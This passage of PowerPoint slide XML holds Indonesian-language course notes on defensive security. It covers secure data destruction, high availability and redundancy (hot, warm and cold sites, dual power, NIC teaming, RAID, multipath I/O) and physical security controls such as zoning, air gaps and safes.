              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hukum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memusnahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memadai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elastisitas</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Toleransi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengelompokan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> situs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hangat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dingin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ganda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, PDU, PSU, dan generator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NIC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyeimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Gunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RAID dan multipath I/O </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tangguh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keragaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memaksimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> area yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamuflase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> perimeter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>celah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>udara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>brankas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
